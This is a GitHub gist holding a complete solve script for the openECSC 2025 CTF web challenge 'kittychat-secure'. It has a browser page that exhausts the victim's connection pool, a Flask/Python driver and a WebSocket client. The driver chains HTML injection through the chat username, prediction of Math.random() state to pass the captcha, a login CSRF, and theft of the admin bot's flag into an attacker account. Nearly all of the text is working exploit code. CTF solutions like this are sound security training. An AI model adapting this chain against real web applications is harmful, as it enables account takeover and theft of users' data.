-
-
Save JorianWoltjer/eaabaa1c50b7ee1bc0cff25e6f33bb7a to your computer and use it in GitHub Desktop.
Solve script for openECSC 2025 - kittychat-secure (https://jorianwoltjer.com/blog/p/ctf/openecsc-2025-kittychat-secure)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
// Origin of the target application as seen from the victim's browser.
const TARGET = "http://localhost:3000"; // URL accessible to victim
// Number of sockets to occupy; exhaust_sockets() fills all but one of them.
const MAX_SOCKETS = 256; // 512 on my own Chrome
// Host whose subdomains answer slowly, used to keep sockets busy.
const SLEEP_SERVER = "sleep.jtw.sh"; // Running https://github.com/salvatore-abello/web-challenges/blob/main/X/salvatoreabello/exploit/sleep-server.go
// AbortController of the request occupying the last free socket.
// Declared explicitly: it is assigned from several functions and would
// otherwise be created as an implicit global (a ReferenceError in strict
// mode or in an ES module).
let blocker = null;
/**
 * Promise-based delay.
 *
 * @param {number} ms  Delay handed to setTimeout, in milliseconds.
 * @returns {Promise<void>} Promise resolved by the timer callback.
 */
function sleep(ms) {
  return new Promise(function (wake) {
    setTimeout(wake, ms);
  });
}
/**
 * Start a request to `http://<s>.<SLEEP_SERVER>/120` and hand back the
 * controller that can cancel it.
 *
 * The request is fired and forgotten; callers only keep the returned
 * controller so they can free the socket again with `abort()`.
 *
 * @param {string|number} s  Label used as the subdomain of SLEEP_SERVER
 *     (presumably so every request targets a distinct host — confirm
 *     against the sleep server setup).
 * @returns {AbortController} Controller whose signal is attached to the fetch.
 */
function fetch_long(s) {
  // Keep the controller local; assigning without a declaration would
  // create/overwrite a global `controller` on every call.
  const controller = new AbortController();
  fetch(`http://${s}.${SLEEP_SERVER}/120`, {
    mode: "no-cors",
    signal: controller.signal,
  }).catch(() => {
    // abort() rejects the fetch promise; that rejection is expected here,
    // so swallow it instead of surfacing an unhandled rejection.
  });
  return controller;
}
/**
 * Start MAX_SOCKETS - 1 long-running requests via fetch_long().
 *
 * @returns {Promise<AbortController[]>} Promise resolving to the controllers
 *     returned by fetch_long(), in the order the requests were started.
 */
function exhaust_sockets() {
  // Fill all but one socket
  const controllers = [];
  for (let id = 0; id < MAX_SOCKETS - 1; id++) {
    controllers.push(fetch_long(id));
  }
  return Promise.all(controllers);
}
/**
 * Abort the current blocker request, yield once to the event loop, then
 * start a new blocker request and store its controller in `blocker`.
 *
 * @returns {Promise<void>}
 */
async function release_once() {
  const gate = blocker;
  gate.abort();
  // Small time for target to make 1 single request
  await sleep(0);
  blocker = fetch_long(1337);
}
// Timeline of the socket-exhaustion side of the exploit. Step numbers refer
// to the numbered comments used throughout the solve script.
(async function run_timeline() {
  // Wait for main exploit to be sent, and scripts to load
  await sleep(2000);

  // 11. Exhaust all available sockets, to stall any network requests
  await exhaust_sockets();
  console.log("BLOCKING");
  blocker = fetch_long(1337);

  // Each entry: how long to wait, then what to log before freeing the
  // socket for exactly one request.
  const releases = [
    // 15. Let target tab fetch current user while still admin (/user)
    [10000, "Releasing 1st socket"],
    // 16. Let target tab fetch admin's flag (/notes)
    [1000, "Releasing 2nd socket"],
  ];
  for (const [delay, label] of releases) {
    await sleep(delay);
    console.log(label);
    await release_once();
  }

  await sleep(5000);
  // 18. After login CSRF, let target tab continue
  console.log("RELEASED ALL");
  blocker.abort();
  // 19. It will fetch /user (now attacker) and save flag with /notes to attacker's account
})();
| </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from WebSocketClient import WebSocketClient | |
| from flask import Flask, render_template | |
| from threading import Thread | |
| from time import sleep | |
| import requests | |
| import secrets | |
| import random | |
| import json | |
| import os | |
| import re | |
| # https://gist.github.com/JorianWoltjer/233e4f4e9ca72be98f4b4314b338184b | |
| from predict import solve_and_predict | |
| from wsclient import WebSocketClient | |
# Flask application serving the exploit page to the victim.
app = Flask(__name__)

HOST = "http://localhost:3000"  # URL accessible to attacker
# HOST = "https://9e8cbf4b-b484-40d6-b4d6-fccb6a6cda3e.openec.sc:1337"
# Same origin as HOST, with the scheme swapped for its WebSocket equivalent.
WS_HOST = HOST.replace("http:", "ws:").replace("https:", "wss:")
LOCAL_HOST = "http://..."  # Attacker's host reachable by victim

# Song URLs loaded from song_links.json next to this script; a URL's list
# index is what get_random_samples() records. The `with` block closes the
# file handle instead of leaving it to the garbage collector.
with open(os.path.join(os.path.dirname(__file__), "song_links.json"),
          encoding="utf-8") as _song_links_file:
    SONG_LINKS = json.load(_song_links_file)
def random_username():
    """Return a name of the form ``kitten_<n>``, fitting /^kitten_[0-9]+$/.

    ``<n>`` is a random 32-bit unsigned integer in decimal.
    """
    suffix = random.getrandbits(32)
    return "kitten_" + str(suffix)
def trigger_stager():
    """Summon the admin bot and redirect its page to ``?msg=1`` (steps 2-5).

    Joins the chat as a random ``kitten_*`` user, records which 16-hex-digit
    user names are already present, sends ``!admin`` and blocks until a USERS
    message lists a 16-hex-digit name that was not there before. It then
    injects a meta-refresh through trigger_html() and waits 3 seconds.
    """
    def admin_ids(users):
        # Names made of exactly 16 lowercase hex digits are the ones the
        # exploit treats as admin sessions.
        return {name for name in users
                if re.fullmatch(r"[0-9a-f]{16}", name)}

    with WebSocketClient(WS_HOST) as ws:
        # 2. Join as anonymous user
        join = {"type": "START", "username": random_username()}
        ws.send(json.dumps(join))
        ws.recv()  # channel
        first_users = json.loads(ws.recv(timeout=20))
        existing = admin_ids(first_users["users"])
        print(f"{existing=}")

        # 3. Trigger admin bot to join
        ws.send(json.dumps({"type": "MESSAGE", "text": "!admin"}))

        def is_new_admin(msg):
            response = json.loads(msg)
            if response["type"] == "USERS":
                # 4. If new admin joined, break
                return admin_ids(response["users"]) - existing
            return False

        ws.recv_until(is_new_admin)

        # 5. Quickly redirect to ?msg=1 to allow /message.js gadget
        trigger_html('<meta http-equiv=refresh content="0;url=?msg=1">')
        sleep(3)  # Wait for everything to reload
def get_random_samples(n=20):
    """Collect ``n`` song indices by sending ``!song`` to the chat.

    For every request the function waits for the reply containing
    "here's a fun song:", extracts the URL after that marker and records
    the URL's position in SONG_LINKS.

    Args:
        n: Number of samples to collect.

    Returns:
        List of ``n`` integer indices into SONG_LINKS, in arrival order.

    Raises:
        ValueError: If a returned URL is not present in SONG_LINKS.
    """
    song_request = json.dumps({"type": "MESSAGE", "text": "!song"})

    def is_song_reply(msg):
        return "here's a fun song:" in msg

    with WebSocketClient(WS_HOST) as ws:
        ws.send(json.dumps({"type": "START", "username": random_username()}))
        samples = []
        for _ in range(n):
            ws.send(song_request)
            reply = json.loads(ws.recv_until(is_song_reply))
            url = reply["text"].split("here's a fun song: ")[1]
            samples.append(SONG_LINKS.index(url))
            print("Got sample", len(samples), url)
        print("Samples:", samples)
        return samples
def trigger_html(html):
    """Join the chat with ``html`` as the user name.

    Opens a fresh WebSocket connection, sends a LOGIN message carrying
    ``html`` as ``username`` followed by a START message, then closes the
    connection.

    Args:
        html: Markup to send as the user name.
    """
    frames = (
        # Login bypass by not passing `key` to inject into users list <div>
        {"type": "LOGIN", "username": html},
        {"type": "START"},
    )
    with WebSocketClient(WS_HOST) as ws:
        for frame in frames:
            ws.send(json.dumps(frame))
def exploit():
    """Run the main attack (steps 6-20) and print the retrieved notes.

    Predicts nine upcoming random values from collected samples, injects two
    HTML payloads through trigger_html(), waits for the victim to act, then
    fetches the notes of the attacker account via the module-level session
    ``s`` and ``userkey``. Also reads the module-level ``username`` and
    ``password``. Terminates the whole process with ``os._exit(0)``.
    """
    # 6. Get 20+ 9-bit samples to solve Math.random() state
    samples = get_random_samples(20)
    print("Solving and predicting...")
    # There is 1 Math.random() call in /chat.js we need to skip
    predictions = solve_and_predict(samples, offset=1)
    captcha_state = [next(predictions) > 0.5 for _ in range(9)]
    print("Predicted captcha state:", captcha_state)

    # 8. Use click gadget to open exploit server in new tab
    opener_html = f'''
<a href="{LOCAL_HOST}" target="_blank" class="redirect"></a>
<p id=message></p>
<script src="/message.js"></script>
'''
    trigger_html(opener_html)
    sleep(4)  # Wait for 3s setTimeout()

    # Preload images to not deal with them in stalled Connection Pool
    preload_imgs = ''.join(
        f'<img src="captcha/{kind}_{i}.webp">'
        for i in range(9) for kind in ("pic", "cat"))
    # Correct images for /captcha.js to be solved
    captcha_imgs = ["<img class=selected>" if picked else "<img>"
                    for picked in captcha_state]
    captcha_html = ''.join(captcha_imgs)

    main_html = f'''
{preload_imgs}
<p id=message></p>
<p id=username></p>
<div class="redirect captcha" id="loadPrivate"></div>
<fake class=captcha>
<button class="redirect">check</button>
<div>
{captcha_html}
</div>
</fake>
<iframe srcdoc='
<!-- 13. Add ?msg=1 parameter to allow /message.js gadget to execute -->
<meta http-equiv=refresh content="5;url=about:srcdoc?msg=1">
<p id=message></p>
<!-- 17. Login CSRF -->
<form action="http://localhost:3000/login" method="post" target="_blank">
<input type=text name=username value="{username}">
<input type=text name=password value="{password}">
<input type=submit class="redirect">
</form>
<script src="/message.js"></script>
'></iframe>
<script src="/captcha/captcha.js"></script>
<!-- 10. Register onclick= handler for #loadPrivate -->
<script src="/account.js"></script>
<!-- 12. Click the loadPrivateNotes() button to trigger captcha -->
<script src="/message.js"></script>
<!-- 14. Click "check captcha" button (correct due to injected <img>s) -->
<script src="/message.js"></script>
'''
    trigger_html(main_html)

    print("Waiting for admin to save flag...")
    sleep(20)

    # 20. Flag was saved to attacker's account, simply retrieve it
    response = s.post(HOST + "/notes", json={"key": userkey})
    notes = response.json()['notes']
    banner = "=" * 40
    print(banner)
    print("FLAG:", notes)
    print(banner)
    # Hard exit so the Flask server thread does not keep the process alive.
    os._exit(0)
@app.route('/')
def index():
    """Serve the ``exploit.html`` template.

    The template receives the module-level ``username`` and ``password``.
    """
    # 9. Bot hits our exploit server, return it the connection pool exhaustion page
    credentials = {"username": username, "password": password}
    return render_template("exploit.html", **credentials)
def register(username, password):
    """Create (or log into) an account on HOST and fetch its user key.

    Posts the credentials to ``/signup``. If the final URL reports that the
    account already exists, logs in through ``/login`` instead. Finally
    reads ``userkey`` from ``/user`` using the same session.

    Args:
        username: Account name to register.
        password: Password for the account.

    Returns:
        Tuple ``(session, userkey)``: the ``requests.Session`` used for the
        calls and the ``userkey`` value returned by ``/user``.

    Raises:
        RuntimeError: If signup or login ends on an unexpected URL. Explicit
            raises are used instead of ``assert`` so the checks still run
            under ``python -O``.
    """
    credentials = {
        'username': username,
        'password': password,
    }
    s = requests.Session()
    r = s.post(HOST + '/signup', json=credentials)
    if "account+already+exists" in r.url:
        r = s.post(HOST + '/login', json=credentials)
        if "/account" not in r.url:
            raise RuntimeError(f"Login failed, ended up at {r.url}")
    elif "account+created" not in r.url:
        raise RuntimeError(f"Signup failed, ended up at {r.url}")
    userkey = s.get(HOST + '/user').json()['userkey']
    return s, userkey
if __name__ == '__main__':
    # Serve the exploit page in the background. The thread is a daemon so
    # that an exception in any step below ends the process instead of
    # leaving it hanging on the never-returning Flask server.
    t = Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": 8000},
               daemon=True)
    t.start()

    # 1. Create account to save flag into eventually
    print("Registering")
    # These stay module-level: index() and exploit() read them as globals.
    username = "j0r1an_" + secrets.token_hex(4)
    password = secrets.token_hex(4)
    s, userkey = register(username, password)
    print("Registered, userkey:", userkey)

    print("Triggering admin bot")
    trigger_stager()
    exploit()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import websocket | |
| import threading | |
| import queue | |
class WebSocketClient:
    """Blocking, queue-backed wrapper around ``websocket.WebSocketApp``.

    The underlying app runs ``run_forever`` on a daemon thread; every
    incoming message is pushed onto ``recv_queue`` so callers can read
    messages synchronously with recv() / recv_until(). Intended to be used
    as a context manager: entering starts the thread and waits for the
    connection, exiting closes it.
    """

    def __init__(self, url):
        """Prepare the connection to ``url`` without opening it yet."""
        self.url = url
        self.ws = websocket.WebSocketApp(
            url,
            on_open=self._on_open,
            on_message=self._on_message,
            on_close=self._on_close,
            on_error=self._on_error,
        )
        # Messages delivered by _on_message, consumed by recv().
        self.recv_queue = queue.Queue()
        # Set by _on_open; __enter__ waits on it.
        self.connected_event = threading.Event()
        self.thread = threading.Thread(target=self.ws.run_forever)
        self.thread.daemon = True

    def _on_open(self, ws):
        self.connected_event.set()

    def _on_message(self, ws, message):
        self.recv_queue.put(message)

    def _on_close(self, ws, code, msg):
        print(f"WebSocket closed: {code} - {msg}")

    def _on_error(self, ws, error):
        print(f"WebSocket error: {error}")

    def send(self, message):
        """Send ``message``; ``bytes`` go out as a binary frame."""
        if isinstance(message, bytes):
            self.ws.send(message, websocket.ABNF.OPCODE_BINARY)
        else:
            self.ws.send(message)

    def recv(self, timeout=5):
        """Return the next queued message.

        Args:
            timeout: Seconds to wait; ``None`` waits indefinitely.

        Raises:
            TimeoutError: If no message arrives within ``timeout``.
        """
        try:
            return self.recv_queue.get(timeout=timeout)
        except queue.Empty:
            # The queue.Empty traceback adds nothing for the caller.
            raise TimeoutError("No message received in time.") from None

    def recv_until(self, condition_func, timeout=None):
        """Discard messages until ``condition_func(message)`` is truthy.

        Args:
            condition_func: Callable receiving each message.
            timeout: Optional overall limit in seconds. The default ``None``
                waits indefinitely, as before.

        Returns:
            The first message for which ``condition_func`` is truthy.

        Raises:
            TimeoutError: If ``timeout`` elapses before a message matches.
        """
        from time import monotonic  # local: this module does not import time

        deadline = None if timeout is None else monotonic() + timeout
        while True:
            if deadline is None:
                remaining = None
            else:
                remaining = max(0.0, deadline - monotonic())
            message = self.recv(timeout=remaining)
            if condition_func(message):
                return message

    def close(self):
        """Close the socket and give the worker thread up to 1s to finish."""
        self.ws.close()
        self.thread.join(timeout=1)

    def __enter__(self):
        self.thread.start()
        if not self.connected_event.wait(timeout=5):
            # Do not leave the worker thread and socket behind when the
            # connection never opened.
            self.close()
            raise TimeoutError("Could not connect to WebSocket server.")
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.close()
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment